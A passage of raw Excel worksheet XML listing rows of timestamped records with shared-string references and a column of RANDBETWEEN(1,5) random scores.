      <c r="D23009" t="s">
        <v>251</v>
      </c>
      <c r="E23009" t="s">
        <v>20800</v>
      </c>
      <c r="F23009">
        <f t="shared" ca="1" si="359"/>
        <v>5</v>
      </c>
    </row>
    <row r="23010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23010" s="1">
        <v>43029.617025462961</v>
      </c>
      <c r="C23010" t="s">
        <v>48</v>
      </c>
      <c r="E23010" t="s">
        <v>20801</v>
      </c>
      <c r="F23010">
        <f t="shared" ca="1" si="359"/>
        <v>1</v>
      </c>
    </row>
    <row r="23011" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23011" s="1">
        <v>43029.55400462963</v>
      </c>
      <c r="C23011" t="s">
        <v>10</v>
      </c>
      <c r="D23011" t="s">
        <v>163</v>
      </c>
      <c r="E23011" s="2" t="s">
        <v>20802</v>
      </c>
      <c r="F23011">
        <f t="shared" ca="1" si="359"/>
        <v>5</v>
      </c>
    </row>
    <row r="23012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23012" s="1">
        <v>43029.05777777778</v>
      </c>
      <c r="C23012" t="s">
        <v>41</v>
      </c>
      <c r="E23012">
        <v>9121006474</v>
      </c>
      <c r="F23012">
        <f t="shared" ca="1" si="359"/>
        <v>4</v>
      </c>
    </row>
    <row r="23013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23013" s="1">
        <v>43028.803182870368</v>
      </c>
      <c r="C23013" t="s">
        <v>10</v>
      </c>
      <c r="D23013" t="s">
        <v>178</v>
      </c>
      <c r="E23013" t="s">
        <v>20803</v>
      </c>
      <c r="F23013">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23014" s="1">
        <v>43028.73809027778</v>
      </c>
      <c r="C23014" t="s">
        <v>10</v>
      </c>
      <c r="D23014" t="s">
        <v>6</v>
      </c>
      <c r="E23014" t="s">
        <v>20804</v>
      </c>
      <c r="F23014">
        <f t="shared" ca="1" si="359"/>
        <v>2</v>
      </c>
    </row>
    <row r="23015" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23015" s="1">
        <v>43028.70853009259</v>
      </c>
      <c r="C23015" t="s">
        <v>10</v>
      </c>
      <c r="D23015" t="s">
        <v>20</v>
      </c>
      <c r="E23015" s="2" t="s">
        <v>20805</v>
      </c>
      <c r="F23015">
        <f t="shared" ca="1" si="359"/>
        <v>1</v>
      </c>
    </row>
    <row r="23016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23016" s="1">
        <v>43028.679398148146</v>
      </c>
      <c r="C23016" t="s">
        <v>10</v>
      </c>
      <c r="D23016" t="s">
        <v>52</v>
      </c>
      <c r="E23016" t="s">
        <v>20806</v>
      </c>
      <c r="F23016">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23017" s="1">
        <v>43028.676608796297</v>
      </c>
      <c r="C23017" t="s">
        <v>10</v>
      </c>
      <c r="D23017" t="s">
        <v>6</v>
      </c>
      <c r="E23017" t="s">
        <v>20807</v>
      </c>
      <c r="F23017">
        <f t="shared" ca="1" si="359"/>
        <v>4</v>
      </c>
    </row>
    <row r="23018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23018" s="1">
        <v>43028.670671296299</v>
      </c>
      <c r="C23018" t="s">
        <v>10</v>
      </c>
      <c r="D23018" t="s">
        <v>23</v>
      </c>
      <c r="E23018" t="s">
        <v>20808</v>
      </c>
      <c r="F23018">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23019" s="1">
        <v>43028.655856481484</v>
      </c>
      <c r="C23019" t="s">
        <v>41</v>
      </c>
      <c r="E23019" t="s">
        <v>1446</v>
      </c>
      <c r="F23019">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23020" s="1">
        <v>43028.620706018519</v>
      </c>
      <c r="C23020" t="s">
        <v>10</v>
      </c>
      <c r="D23020" t="s">
        <v>271</v>
      </c>
      <c r="E23020" t="s">
        <v>20809</v>
      </c>
      <c r="F23020">
        <f t="shared" ca="1" si="359"/>
        <v>2</v>
      </c>
    </row>
    <row r="23021" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23021" s="1">
        <v>43028.619004629632</v>
      </c>
      <c r="C23021" t="s">
        <v>454</v>
      </c>
      <c r="D23021" t="s">
        <v>89</v>
      </c>
      <c r="E23021" s="2" t="s">
        <v>20810</v>
      </c>
      <c r="F23021">
        <f t="shared" ca="1" si="359"/>
        <v>4</v>
      </c>
    </row>
    <row r="23022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23022" s="1">
        <v>43028.615324074075</v>
      </c>
      <c r="C23022" t="s">
        <v>6</v>
      </c>
      <c r="D23022" t="s">
        <v>25</v>
      </c>
      <c r="E23022" t="s">
        <v>20811</v>
      </c>
      <c r="F23022">
        <f t="shared" ca="1" si="359"/>
        <v>5</v>
      </c>
    </row>
    <row r="23023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23023" s="1">
        <v>43028.596180555556</v>
      </c>
      <c r="C23023" t="s">
        <v>10</v>
      </c>
      <c r="D23023" t="s">
        <v>6</v>
      </c>
      <c r="E23023" t="s">
        <v>20812</v>
      </c>
      <c r="F23023">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23024" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23024" s="1">
        <v>43028.592488425929</v>
      </c>
      <c r="C23024" t="s">
        <v>10</v>
      </c>
      <c r="D23024" t="s">
        <v>163</v>
      </c>
      <c r="E23024" s="2" t="s">
        <v>20813</v>
      </c>
      <c r="F23024">
        <f t="shared" ca="1" si="359"/>
        <v>4</v>
      </c>
    </row>
    <row r="23025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23025" s="1">
        <v>43028.574629629627</v>
      </c>
      <c r="C23025" t="s">
        <v>10</v>
      </c>
      <c r="D23025" t="s">
        <v>6</v>
      </c>
      <c r="E23025" t="s">
        <v>20814</v>
      </c>
      <c r="F23025">
        <f t="shared" ca="1" si="359"/>
        <v>1</v>
      </c>
    </row>
    <row r="23026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23026" s="1">
        <v>43028.558275462965</v>
      </c>
      <c r="C23026" t="s">
        <v>6</v>
      </c>
      <c r="D23026" t="s">
        <v>114</v>
      </c>
      <c r="E23026" t="s">
        <v>20815</v>
      </c>
      <c r="F23026">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23027" s="1">
        <v>43028.556111111109</v>
      </c>
      <c r="C23027" t="s">
        <v>454</v>
      </c>
      <c r="E23027" t="s">
        <v>20816</v>
      </c>
      <c r="F23027">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23028" s="1">
        <v>43028.55091435185</v>
      </c>
      <c r="C23028" t="s">
        <v>10</v>
      </c>
      <c r="D23028" t="s">
        <v>163</v>
      </c>
      <c r="E23028" t="s">
        <v>20817</v>
      </c>
      <c r="F23028">
        <f t="shared" ca="1" si="359"/>
        <v>2</v>
      </c>
    </row>
    <row r="23029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23029" s="1">
        <v>43028.516932870371</v>
      </c>
      <c r="C23029" t="s">
        <v>6</v>
      </c>
      <c r="D23029" t="s">
        <v>25</v>
      </c>
      <c r="E23029" t="s">
        <v>20818</v>
      </c>
      <c r="F23029">
        <f t="shared" ca="1" si="359"/>
        <v>1</v>
      </c>
    </row>
    <row r="23030" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23030" s="1">
        <v>43028.506874999999</v>
      </c>
      <c r="C23030" t="s">
        <v>14</v>
      </c>
      <c r="E23030" s="2" t="s">
        <v>20819</v>
      </c>
      <c r="F23030">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23031" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23031" s="1">
        <v>43028.482465277775</v>
      </c>
      <c r="C23031" t="s">
        <v>65</v>
      </c>
      <c r="E23031" s="2" t="s">
        <v>20820</v>
      </c>
      <c r="F23031">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23032" s="1">
        <v>43028.443553240744</v>
      </c>
      <c r="C23032" t="s">
        <v>10</v>
      </c>
      <c r="D23032" t="s">
        <v>20</v>
      </c>
      <c r="E23032" t="s">
        <v>20821</v>
      </c>
      <c r="F23032">
        <f t="shared" ca="1" si="359"/>
        <v>1</v>
      </c>
    </row>
    <row r="23033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23033" s="1">
        <v>43028.440520833334</v>
      </c>
      <c r="C23033" t="s">
        <v>10</v>
      </c>
      <c r="D23033" t="s">
        <v>14</v>
      </c>
      <c r="E23033" t="s">
        <v>20822</v>
      </c>
      <c r="F23033">
        <f t="shared" ca="1" si="359"/>
        <v>1</v>
      </c>
    </row>
    <row r="23034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23034" s="1">
        <v>43028.429710648146</v>
      </c>
      <c r="C23034" t="s">
        <v>10</v>
      </c>
      <c r="D23034" t="s">
        <v>89</v>
      </c>
      <c r="E23034" t="s">
        <v>20823</v>
      </c>
      <c r="F23034">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23035" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23035" s="1">
        <v>43028.422731481478</v>
      </c>
      <c r="C23035" t="s">
        <v>65</v>
      </c>
      <c r="E23035" s="2" t="s">
        <v>20824</v>
      </c>
      <c r="F23035">
        <f t="shared" ca="1" si="359"/>
        <v>2</v>
      </c>
    </row>
    <row r="23036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23036" s="1">
        <v>43028.418692129628</v>
      </c>
      <c r="C23036" t="s">
        <v>10</v>
      </c>
      <c r="D23036" t="s">
        <v>14</v>
      </c>
      <c r="E23036" t="s">
        <v>20825</v>
      </c>
      <c r="F23036">
        <f t="shared" ca="1" si="359"/>
        <v>4</v>
      </c>
    </row>
    <row r="23037" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23037" s="1">
        <v>43028.404780092591</v>
      </c>
      <c r="C23037" t="s">
        <v>71</v>
      </c>
      <c r="E23037" s="2" t="s">
        <v>20826</v>
      </c>
      <c r="F23037">
        <f t="shared" ca="1" si="359"/>
        <v>3</v>
      </c>
    </row>
    <row r="23038" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23038" s="1">
        <v>43028.388310185182</v>
      </c>
      <c r="C23038" t="s">
        <v>48</v>
      </c>
      <c r="E23038" s="2" t="s">
        <v>20827</v>
      </c>
      <c r="F23038">
        <f t="shared" ca="1" si="359"/>
        <v>5</v>
      </c>
    </row>
    <row r="23039" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23039" s="1">
        <v>43028.335949074077</v>
      </c>
      <c r="C23039" t="s">
        <v>535</v>
      </c>
      <c r="E23039" s="2" t="s">
        <v>20828</v>
      </c>
      <c r="F23039">
        <f t="shared" ca="1" si="359"/>
        <v>1</v>
      </c>
    </row>
    <row r="23040" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23040" s="1">
        <v>43028.330590277779</v>
      </c>
      <c r="C23040" t="s">
        <v>10</v>
      </c>
      <c r="D23040" t="s">
        <v>244</v>
      </c>
      <c r="E23040" s="2" t="s">
        <v>20829</v>
      </c>
      <c r="F23040">
        <f t="shared" ca="1" si="359"/>
        <v>4</v>
      </c>
    </row>
    <row r="23041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23041" s="1">
        <v>43028.327905092592</v>
      </c>
      <c r="C23041" t="s">
        <v>48</v>
      </c>
      <c r="E23041" t="s">
        <v>20830</v>
      </c>
      <c r="F23041">
        <f t="shared" ca="1" si="359"/>
        <v>4</v>
      </c>
    </row>
    <row r="23042" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23042" s="1">
        <v>43028.267199074071</v>
      </c>
      <c r="C23042" t="s">
        <v>65</v>
      </c>
      <c r="E23042" s="2" t="s">
        <v>20831</v>
      </c>
      <c r="F23042">
        <f t="shared" ref="F23042:F23105" ca="1" si="360">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="23043" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A23043" s="1">
        <v>43028.263194444444</v>
      </c>
      <c r="C23043" t="s">
        <v>65</v>
      </c>
      <c r="E23043" s="2" t="s">
        <v>20832</v>
      </c>
      <c r="F23043">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23044" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23044" s="1">
        <v>43028.233981481484</v>
      </c>
      <c r="C23044" t="s">
        <v>60</v>
      </c>
      <c r="E23044" s="2" t="s">
        <v>20833</v>
      </c>
      <c r="F23044">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23045" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A23045" s="1">
        <v>43028.216874999998</v>
      </c>
      <c r="C23045" t="s">
        <v>471</v>
      </c>
      <c r="E23045" s="2" t="s">
        <v>20834</v>
      </c>
      <c r="F23045">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23046" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23046" s="1">
        <v>43028.211446759262</v>
      </c>
      <c r="C23046" t="s">
        <v>103</v>
      </c>
      <c r="E23046" s="2" t="s">
        <v>20835</v>
      </c>
      <c r="F23046">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23047" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23047" s="1">
        <v>43028.206006944441</v>
      </c>
      <c r="C23047" t="s">
        <v>50</v>
      </c>
      <c r="E23047" t="s">
        <v>20836</v>
      </c>
      <c r="F23047">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23048" s="1">
        <v>43028.205069444448</v>
      </c>
      <c r="C23048" t="s">
        <v>71</v>
      </c>
      <c r="D23048" t="s">
        <v>312</v>
      </c>
      <c r="E23048" t="s">
        <v>20837</v>
      </c>
      <c r="F23048">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23049" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23049" s="1">
        <v>43028.204895833333</v>
      </c>
      <c r="C23049" t="s">
        <v>71</v>
      </c>
      <c r="D23049" t="s">
        <v>312</v>
      </c>
      <c r="E23049" t="s">
        <v>20837</v>
      </c>
      <c r="F23049">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23050" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23050" s="1">
        <v>43028.189918981479</v>
      </c>
      <c r="C23050" t="s">
        <v>73</v>
      </c>
      <c r="E23050" t="s">
        <v>20838</v>
      </c>
      <c r="F23050">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23051" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23051" s="1">
        <v>43028.176041666666</v>
      </c>
      <c r="C23051" t="s">
        <v>71</v>
      </c>
      <c r="E23051" s="2" t="s">
        <v>20839</v>
      </c>
      <c r="F23051">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23052" s="1">
        <v>43028.160787037035</v>
      </c>
      <c r="C23052" t="s">
        <v>7253</v>
      </c>
      <c r="F23052">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23053" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A23053" s="1">
        <v>43028.129571759258</v>
      </c>
      <c r="C23053" t="s">
        <v>71</v>
      </c>
      <c r="E23053" s="2" t="s">
        <v>20840</v>
      </c>
      <c r="F23053">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23054" s="1">
        <v>43028.129340277781</v>
      </c>
      <c r="C23054" t="s">
        <v>731</v>
      </c>
      <c r="D23054" t="s">
        <v>312</v>
      </c>
      <c r="E23054" t="s">
        <v>20841</v>
      </c>
      <c r="F23054">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23055" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23055" s="1">
        <v>43028.110451388886</v>
      </c>
      <c r="C23055" t="s">
        <v>41</v>
      </c>
      <c r="E23055" s="2" t="s">
        <v>20842</v>
      </c>
      <c r="F23055">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23056" s="1">
        <v>43028.104537037034</v>
      </c>
      <c r="C23056" t="s">
        <v>10</v>
      </c>
      <c r="D23056" t="s">
        <v>86</v>
      </c>
      <c r="F23056">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23057" s="1">
        <v>43028.103680555556</v>
      </c>
      <c r="C23057" t="s">
        <v>10</v>
      </c>
      <c r="D23057" t="s">
        <v>86</v>
      </c>
      <c r="E23057" t="s">
        <v>20843</v>
      </c>
      <c r="F23057">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23058" s="1">
        <v>43028.045937499999</v>
      </c>
      <c r="C23058" t="s">
        <v>41</v>
      </c>
      <c r="E23058" t="s">
        <v>20844</v>
      </c>
      <c r="F23058">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23059" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23059" s="1">
        <v>43028.011273148149</v>
      </c>
      <c r="C23059" t="s">
        <v>10</v>
      </c>
      <c r="D23059" t="s">
        <v>6</v>
      </c>
      <c r="E23059" s="2" t="s">
        <v>20845</v>
      </c>
      <c r="F23059">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23060" s="1">
        <v>43027.7341087963</v>
      </c>
      <c r="C23060" t="s">
        <v>10</v>
      </c>
      <c r="D23060" t="s">
        <v>107</v>
      </c>
      <c r="E23060" t="s">
        <v>20846</v>
      </c>
      <c r="F23060">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23061" s="1">
        <v>43027.72550925926</v>
      </c>
      <c r="C23061" t="s">
        <v>6</v>
      </c>
      <c r="D23061" t="s">
        <v>194</v>
      </c>
      <c r="E23061" t="s">
        <v>20847</v>
      </c>
      <c r="F23061">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23062" s="1">
        <v>43027.706631944442</v>
      </c>
      <c r="C23062" t="s">
        <v>107</v>
      </c>
      <c r="E23062" t="s">
        <v>20848</v>
      </c>
      <c r="F23062">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23063" s="1">
        <v>43027.684594907405</v>
      </c>
      <c r="C23063" t="s">
        <v>10</v>
      </c>
      <c r="D23063" t="s">
        <v>374</v>
      </c>
      <c r="E23063" t="s">
        <v>20849</v>
      </c>
      <c r="F23063">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23064" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23064" s="1">
        <v>43027.678923611114</v>
      </c>
      <c r="C23064" t="s">
        <v>6</v>
      </c>
      <c r="D23064" t="s">
        <v>25</v>
      </c>
      <c r="E23064" t="s">
        <v>20850</v>
      </c>
      <c r="F23064">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23065" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A23065" s="1">
        <v>43027.668969907405</v>
      </c>
      <c r="C23065" t="s">
        <v>10</v>
      </c>
      <c r="D23065" t="s">
        <v>17</v>
      </c>
      <c r="E23065" s="2" t="s">
        <v>20851</v>
      </c>
      <c r="F23065">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23066" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23066" s="1">
        <v>43027.663854166669</v>
      </c>
      <c r="C23066" t="s">
        <v>10</v>
      </c>
      <c r="D23066" t="s">
        <v>52</v>
      </c>
      <c r="E23066" t="s">
        <v>20852</v>
      </c>
      <c r="F23066">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23067" s="1">
        <v>43027.662881944445</v>
      </c>
      <c r="C23067" t="s">
        <v>10</v>
      </c>
      <c r="D23067" t="s">
        <v>89</v>
      </c>
      <c r="E23067" t="s">
        <v>20853</v>
      </c>
      <c r="F23067">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23068" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23068" s="1">
        <v>43027.639050925929</v>
      </c>
      <c r="C23068" t="s">
        <v>10</v>
      </c>
      <c r="D23068" t="s">
        <v>163</v>
      </c>
      <c r="E23068" s="2" t="s">
        <v>20854</v>
      </c>
      <c r="F23068">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23069" s="1">
        <v>43027.634212962963</v>
      </c>
      <c r="C23069" t="s">
        <v>10</v>
      </c>
      <c r="D23069" t="s">
        <v>89</v>
      </c>
      <c r="E23069" t="s">
        <v>20855</v>
      </c>
      <c r="F23069">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23070" s="1">
        <v>43027.628807870373</v>
      </c>
      <c r="C23070" t="s">
        <v>10</v>
      </c>
      <c r="D23070" t="s">
        <v>163</v>
      </c>
      <c r="E23070" t="s">
        <v>20856</v>
      </c>
      <c r="F23070">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23071" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A23071" s="1">
        <v>43027.610567129632</v>
      </c>
      <c r="C23071" t="s">
        <v>10</v>
      </c>
      <c r="D23071" t="s">
        <v>192</v>
      </c>
      <c r="E23071" s="2" t="s">
        <v>20857</v>
      </c>
      <c r="F23071">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23072" s="1">
        <v>43027.574907407405</v>
      </c>
      <c r="C23072" t="s">
        <v>10</v>
      </c>
      <c r="D23072" t="s">
        <v>107</v>
      </c>
      <c r="E23072" t="s">
        <v>20858</v>
      </c>
      <c r="F23072">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23073" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23073" s="1">
        <v>43027.550416666665</v>
      </c>
      <c r="C23073" t="s">
        <v>82</v>
      </c>
      <c r="E23073" s="2" t="s">
        <v>20859</v>
      </c>
      <c r="F23073">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23074" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23074" s="1">
        <v>43027.52516203704</v>
      </c>
      <c r="C23074" t="s">
        <v>10</v>
      </c>
      <c r="D23074" t="s">
        <v>374</v>
      </c>
      <c r="E23074" t="s">
        <v>20860</v>
      </c>
      <c r="F23074">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23075" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23075" s="1">
        <v>43027.525150462963</v>
      </c>
      <c r="C23075" t="s">
        <v>10</v>
      </c>
      <c r="D23075" t="s">
        <v>14</v>
      </c>
      <c r="E23075" t="s">
        <v>20861</v>
      </c>
      <c r="F23075">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23076" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23076" s="1">
        <v>43027.50571759259</v>
      </c>
      <c r="C23076" t="s">
        <v>71</v>
      </c>
      <c r="E23076" s="2" t="s">
        <v>20862</v>
      </c>
      <c r="F23076">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23077" s="1">
        <v>43027.500601851854</v>
      </c>
      <c r="C23077" t="s">
        <v>10</v>
      </c>
      <c r="D23077" t="s">
        <v>163</v>
      </c>
      <c r="E23077" t="s">
        <v>20863</v>
      </c>
      <c r="F23077">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23078" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A23078" s="1">
        <v>43027.489629629628</v>
      </c>
      <c r="C23078" t="s">
        <v>16</v>
      </c>
      <c r="E23078" s="2" t="s">
        <v>20864</v>
      </c>
      <c r="F23078">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23079" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A23079" s="1">
        <v>43027.449537037035</v>
      </c>
      <c r="C23079" t="s">
        <v>6</v>
      </c>
      <c r="D23079" t="s">
        <v>194</v>
      </c>
      <c r="E23079" s="2" t="s">
        <v>20865</v>
      </c>
      <c r="F23079">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23080" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23080" s="1">
        <v>43027.445532407408</v>
      </c>
      <c r="C23080" t="s">
        <v>6</v>
      </c>
      <c r="D23080" t="s">
        <v>25</v>
      </c>
      <c r="E23080" s="2" t="s">
        <v>20866</v>
      </c>
      <c r="F23080">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23081" s="1">
        <v>43027.443576388891</v>
      </c>
      <c r="C23081" t="s">
        <v>6</v>
      </c>
      <c r="D23081" t="s">
        <v>25</v>
      </c>
      <c r="E23081" t="s">
        <v>20867</v>
      </c>
      <c r="F23081">
        <f t="shared" ca="1" si="360"/>
        <v>4</v>
      </c>
    </row>
    <row r="23082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23082" s="1">
        <v>43027.440613425926</v>
      </c>
      <c r="C23082" t="s">
        <v>6</v>
      </c>
      <c r="D23082" t="s">
        <v>25</v>
      </c>
      <c r="E23082" t="s">
        <v>20868</v>
      </c>
      <c r="F23082">
        <f t="shared" ca="1" si="360"/>
        <v>3</v>
      </c>
    </row>
    <row r="23083" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23083" s="1">
        <v>43027.42628472222</v>
      </c>
      <c r="C23083" t="s">
        <v>10</v>
      </c>
      <c r="D23083" t="s">
        <v>14</v>
      </c>
      <c r="E23083" t="s">
        <v>20869</v>
      </c>
      <c r="F23083">
        <f t="shared" ca="1" si="360"/>
        <v>2</v>
      </c>
    </row>
    <row r="23084" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23084" s="1">
        <v>43027.416516203702</v>
      </c>
      <c r="C23084" t="s">
        <v>6</v>
      </c>
      <c r="D23084" t="s">
        <v>25</v>
      </c>
      <c r="E23084" s="2" t="s">
        <v>20870</v>
      </c>
      <c r="F23084">
        <f t="shared" ca="1" si="360"/>
        <v>1</v>
      </c>
    </row>
    <row r="23085" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23085" s="1">
        <v>43027.364768518521</v>
      </c>
      <c r="C23085" t="s">
        <v>623</v>
      </c>
      <c r="E23085" s="2" t="s">
        <v>20871</v>
      </c>
      <c r="F23085">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23086" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23086" s="1">
        <v>43027.361990740741</v>
      </c>
      <c r="C23086" t="s">
        <v>623</v>
      </c>
      <c r="E23086" t="s">
        <v>20872</v>
      </c>
      <c r="F23086">
        <f t="shared" ca="1" si="360"/>
        <v>5</v>
      </c>
    </row>
    <row r="23087" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23087" s="1">
        <v>43027.357835648145</v>
      </c>
      <c r="C23087" t="s">
        <v>1381</v>
      </c>
      <c r="E23087" s="2" t="s">
        <v>20873</v>
      </c>
      <c r="F23087">
